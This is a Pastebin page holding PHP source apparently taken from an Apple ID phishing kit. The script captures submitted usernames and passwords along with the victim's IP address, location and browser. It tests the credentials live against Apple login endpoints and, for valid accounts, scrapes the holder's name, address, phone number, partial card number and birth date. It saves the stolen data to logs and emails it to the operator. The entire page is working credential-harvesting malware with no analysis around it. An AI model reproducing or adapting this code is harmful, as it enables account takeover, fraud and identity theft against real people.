SHARE
TWEET

Untitled

a guest Jun 7th, 2017 708 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4. require "session_protect.php";
  5. require "detect_country.php";
  6. require "antibotlogin.php";
  7. require "functions.php";
  8. require "../../CONTROLS.php";
  9. $_SESSION['user'] = $_POST['user'];
  10. $_SESSION['pass'] = $_POST['pass'];
  11. $ip = $_SERVER['REMOTE_ADDR'];
  12. $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
  13. $VictimInfo1 = "| IP Address :"." ".$_SERVER['REMOTE_ADDR']." (".gethostbyaddr($_SERVER['REMOTE_ADDR']).")";
  14. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
  15. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
  16. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
  17. $VictimInfo5 = "| Platform :"." ".$systemInfo['os'];
  18. $from = $From_Address;
  19. $headers = "From: Apple Account <".$from.">";
  20. $subj = "Apple [ ".$nama_negara." - ".$ip." ]";
  21. $to = $Your_Email;
  22. $data = "
  23. [+]=================MyYosi=================[+]
  24. [+]Username : ".$_SESSION['user']."
  25. [+]Password : ".$_SESSION['pass']."
  26. [+]========================================[+]
  27. [+]$VictimInfo1
  28. [+]$VictimInfo2
  29. [+]$VictimInfo3
  30. [+]$VictimInfo4
  31. [+]$VictimInfo5
  32. [+]==================Thnx==================[+]
  33. ";
  34. function curl($url, $post = null, $usecookie = null, $sock = null, $timeout = null) {  
  35.     $ch = curl_init();
  36.     if($post != null) {
  37.         curl_setopt($ch, CURLOPT_POST, 1);
  38.         curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  39.     }
  40.     if($timeout != null){
  41.         curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, $timeout);
  42.     }
  43.     if($sock != null){
  44.             curl_setopt($ch, CURLOPT_PROXY, $sock);
  45.             curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  46.     }
  47.     curl_setopt($ch, CURLOPT_URL, $url);
  48.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  49.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53");
  50.     if ($usecookie != null) {
  51.         curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
  52.         curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);    
  53.     }
  54.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  55.     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  56.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  57.     $result=curl_exec ($ch);
  58.     curl_close ($ch);
  59.     return $result;
  60. }
  61. function getStr($string,$start,$end){
  62.     $str = explode($start,$string);
  63.     $str = explode($end,$str[1]);
  64.     return $str[0];
  65. }
  66. function AppleValid($email) {
  67.     $cookies = "cookies/".md5($_SERVER['REMOTE_ADDR']).'.txt';
  68.     $url = "https://ams.apple.com/pages/SignUp.jsf";
  69.     $data = "SignUpForm=SignUpForm&SignUpForm%3AemailField=".$email."&SignUpForm%3AblueCenter=Continue&javax.faces.ViewState=j_id1";
  70.     $page = curl($url,"",$cookies);
  71.     if($page) {
  72.         $curl = curl($url,$data,$cookies);
  73.         if(preg_match('/This email address is already in use for another Apple ID account/i',$curl)) {
  74.             $result = "Valid";
  75.         } else {
  76.             $result = "Invalid";
  77.         }
  78.     } else {
  79.         $result = "UnKnown";
  80.     }
  81.     @unlink($cookies);
  82.     return $result;
  83. }
  84. function GetAddress($email, $cookies) {
  85.     $link = "https://appleid.apple.com/account/manage";
  86.     $result = curl($link,"",$cookies);
  87.     preg_match('/("fullName":")(.*) /',$result, $app_name);$ex1 = explode('","', $app_name[2]);
  88.     $apple['fullname'] = preg_replace('/\s+/', ' ', strip_tags($ex1[0]));
  89.     $_SESSION['fullname'] = $apple['fullname'];
  90.     $delcar[1] = str_replace("••••", "", $apple['fullname']);
  91.     $delcar[2] = str_replace("\u2022", "", $delcar[1]);
  92.     $clearspace = str_replace("  ", " ", $delcar[2]);
  93.     $plode = explode(" ",$clearspace);
  94.     if(empty($plode[2])){
  95.         $apple['firstname'] = $plode[0];
  96.         $_SESSION['firstname'] = $apple['firstname'];
  97.         $apple['midlename'] = "";
  98.         $_SESSION['midlename'] = $apple['midlename'];
  99.         $apple['lastname'] = $plode[1];
  100.         $_SESSION['lastname'] = $apple['lastname'];
  101.     } else {
  102.         $apple['firstname'] = $plode[0];
  103.         $_SESSION['firstname'] = $apple['firstname'];
  104.         $apple['midlename'] = $plode[1];
  105.         $_SESSION['midlename'] = $apple['midlename'];
  106.         $apple['lastname'] = $plode[2];
  107.         $_SESSION['lastname'] = $apple['lastname'];
  108.     }
  109.     preg_match('/("line1":")(.*)/',$result, $app_address);$ex2 = explode('","', $app_address[2]);
  110.     $apple['address'] = preg_replace('/\s+/', ' ', strip_tags($ex2[0]));
  111.     $_SESSION['address'] = $apple['address'];
  112.     preg_match('/(city":")(.*)/',$result, $app_city);$ex3 = explode('","', $app_city[2]);
  113.     $apple['city'] = preg_replace('/\s+/', ' ', strip_tags($ex3[0]));
  114.     $_SESSION['city'] = $apple['city'];
  115.     preg_match('/(postalCode":")(.*)/',$result, $app_zip);$ex5 = explode('","', $app_zip[2]);
  116.     $apple['zip'] = preg_replace('/\s+/', ' ', strip_tags($ex5[0]));
  117.     $_SESSION['zip'] = $apple['zip'];
  118.     preg_match('/(stateProvinceName":")(.*)/',$result, $app_state);$ex4 = explode('","', $app_state[2]);
  119.     $apple['state'] = preg_replace('/\s+/', ' ', strip_tags($ex4[0]));
  120.     if(!empty($apple['state'])){
  121.         $_SESSION['state'] = $apple['state'];
  122.     } else {
  123.         $_SESSION['state'] = "-";
  124.     }
  125.     preg_match('/(fullNumberWithCountryPrefix":")(.*)/',$result, $app_phone);$ex6 = explode('","', $app_phone[2]);
  126.     $X_app_phone[0] = preg_replace('/\s+/', ' ', strip_tags($ex6[0]));
  127.     $X_app_phone[1] = str_replace(" ", "", $X_app_phone[0]);
  128.     $X_app_phone[2] = str_replace(chr(194).chr(160), "", $X_app_phone[1]);
  129.     $X_app_phone[3] = str_replace("+", "", $X_app_phone[2]);
  130.     $X_app_phone[4] = str_replace("-", "", $X_app_phone[3]);
  131.     $X_app_phone[5] = str_replace("(", "", $X_app_phone[4]);
  132.     $X_app_phone[6] = str_replace(")", "", $X_app_phone[5]);
  133.     $apple['phone'] = trim($X_app_phone[6]);
  134.     $_SESSION['phone'] = $apple['phone'];
  135.     preg_match('/(obfuscatedNumber":")(.*)/',$result, $app_carta);$ex7 = explode('","', $app_carta[2]);
  136.     $apple['carta'] = preg_replace('/\s+/', ' ', strip_tags($ex7[0]));
  137.     $_SESSION['carta'] = $apple['carta'];
  138.     preg_match('/(birthday":")(.*)/',$result, $app_bith);$ex8 = explode('","', $app_bith[2]);
  139.     $dob = preg_replace('/\s+/', ' ', strip_tags($ex8[0]));
  140.     $pecah = explode("-",$dob);
  141.     $apple['dob'] = $pecah[1]."/".$pecah[2]."/".$pecah[0];
  142.     $_SESSION['dob'] = $apple['dob'];      
  143.     $json = json_encode($apple);
  144.     $file = fopen("../logs/address/".$email.".dat", "w");
  145.     fwrite($file, $json."\n");
  146.     return $json;
  147. }
  148. function AppleChk($email, $password){
  149.         $cookies = md5($_SERVER['REMOTE_ADDR']).'.txt';
  150.         $url = "https://idmsa.apple.com/IDMSWebAuth/authenticate";
  151.         $page = curl($url,'',$cookies);
  152.         $data = 'appleId='.$email.'&accountPassword='.$password.'&appIdKey=af1139274f266b22b68c2a3e7ad932cb3c0bbe854e13a79af78dcc73136882c3&accNameLocked=false&language=US-EN&path=/signin/?referrer=/account/manage&Env=PROD';
  153.         $curl = curl($url,$data,$cookies);
  154.         if(stripos($curl, 'Location') !== false) {
  155.             $result['error'] = 0;
  156.             $result['details'] = GetAddress($email, $cookies);
  157.             $result['status'] = "Live";
  158.             @unlink($cookies);
  159.         } else {
  160.             $result['error'] = 2;
  161.             $result['status'] = "Dead";
  162.             @unlink($cookies);
  163.         }
  164.  
  165.     return json_encode($result);
  166. }
  167. if($True_Login == 1) {
  168.     $applechk = AppleValid($_POST['user']);
  169.     if ($applechk == 'Invalid') {
  170.         echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
  171.         exit();
  172.     } elseif($applechk == 'UnKnown') {
  173.         echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
  174.         exit();
  175.     } elseif($applechk == 'Valid') {
  176.         if($Encrypt==1){
  177.             include("AES.php");
  178.             $imputText = $data;
  179.             $imputKey = $Key;
  180.             $blockSize = 256;
  181.             $aes = new AES($imputText, $imputKey, $blockSize);
  182.             $enc = $aes->encrypt();
  183.             $aes->setData($enc);
  184.             $dec=$aes->decrypt();
  185.         }
  186.         if($Save_Log==1) {
  187.             if($Encrypt==1) {
  188.             $file=fopen("../logs/".$Login_Log,"a");
  189.             fwrite($file,$enc);
  190.             fclose($file);
  191.             }
  192.             else {
  193.             $file=fopen("../logs/".$Login_Log,"a");
  194.             fwrite($file,$data);
  195.             fclose($file);
  196.             }
  197.         }  
  198.         if($Send_Log==1) {
  199.             if($Encrypt==1) {
  200.                 mail($to,$subj,$enc,$headers); 
  201.             } else {
  202.                 mail($to,$subj,$data,$headers);
  203.             }
  204.         } ?>
  205.         <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
  206.         <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
  207.         <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
  208.         </form>
  209.         <script language="JavaScript">
  210.         document.frm.submit();
  211.         </script>
  212.     <?php exit();
  213.     }
  214. } elseif($True_Login == 2) {
  215.     $check = AppleChk($_POST['user'], $_POST['pass']);
  216.     $json = json_decode($check);
  217.     if($json->status == "Dead"){
  218.         echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
  219.         exit();
  220.     } elseif($json->status == "Live"){
  221.         if($Encrypt==1){
  222.             include("AES.php");
  223.             $imputText = $data;
  224.             $imputKey = $Key;
  225.             $blockSize = 256;
  226.             $aes = new AES($imputText, $imputKey, $blockSize);
  227.             $enc = $aes->encrypt();
  228.             $aes->setData($enc);
  229.             $dec=$aes->decrypt();
  230.         }
  231.         if($Save_Log==1) {
  232.             if($Encrypt==1) {
  233.             $file=fopen("../logs/".$Login_Log,"a");
  234.             fwrite($file,$enc);
  235.             fclose($file);
  236.             }
  237.             else {
  238.             $file=fopen("../logs/".$Login_Log,"a");
  239.             fwrite($file,$data);
  240.             fclose($file);
  241.             }
  242.         }  
  243.         if($Send_Log==1) {
  244.             if($Encrypt==1) {
  245.                 mail($to,$subj,$enc,$headers); 
  246.             } else {
  247.                 mail($to,$subj,$data,$headers);
  248.             }
  249.         }
  250.     ?>
  251.         <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
  252.         <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
  253.         <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
  254.         </form>
  255.         <script language="JavaScript">
  256.         document.frm.submit();
  257.         </script>
  258.     <?php } else {
  259.         echo '<meta http-equiv="refresh" content="0;url=../../LoginFailed.php?sslchannel=true&sessionid='.md5(gmdate("r")).sha1(gmdate("r")).'" />';
  260.         exit();
  261.     }
  262. } else {
  263.     if($Encrypt==1){
  264.         include("AES.php");
  265.         $imputText = $data;
  266.         $imputKey = $Key;
  267.         $blockSize = 256;
  268.         $aes = new AES($imputText, $imputKey, $blockSize);
  269.         $enc = $aes->encrypt();
  270.         $aes->setData($enc);
  271.         $dec=$aes->decrypt();
  272.     }
  273.     if($Save_Log==1) {
  274.         if($Encrypt==1) {
  275.         $file=fopen("../logs/".$Login_Log,"a");
  276.         fwrite($file,$enc);
  277.         fclose($file);
  278.         }
  279.         else {
  280.         $file=fopen("../logs/".$Login_Log,"a");
  281.         fwrite($file,$data);
  282.         fclose($file);
  283.         }
  284.     }  
  285.     if($Send_Log==1) {
  286.         if($Encrypt==1) {
  287.             mail($to,$subj,$enc,$headers); 
  288.         } else {
  289.             mail($to,$subj,$data,$headers);
  290.         }
  291.     } ?>
  292.     <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
  293.     <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
  294.     <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
  295.     </form>
  296.     <script language="JavaScript">
  297.     document.frm.submit();
  298.     </script>
  299. <?php } ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top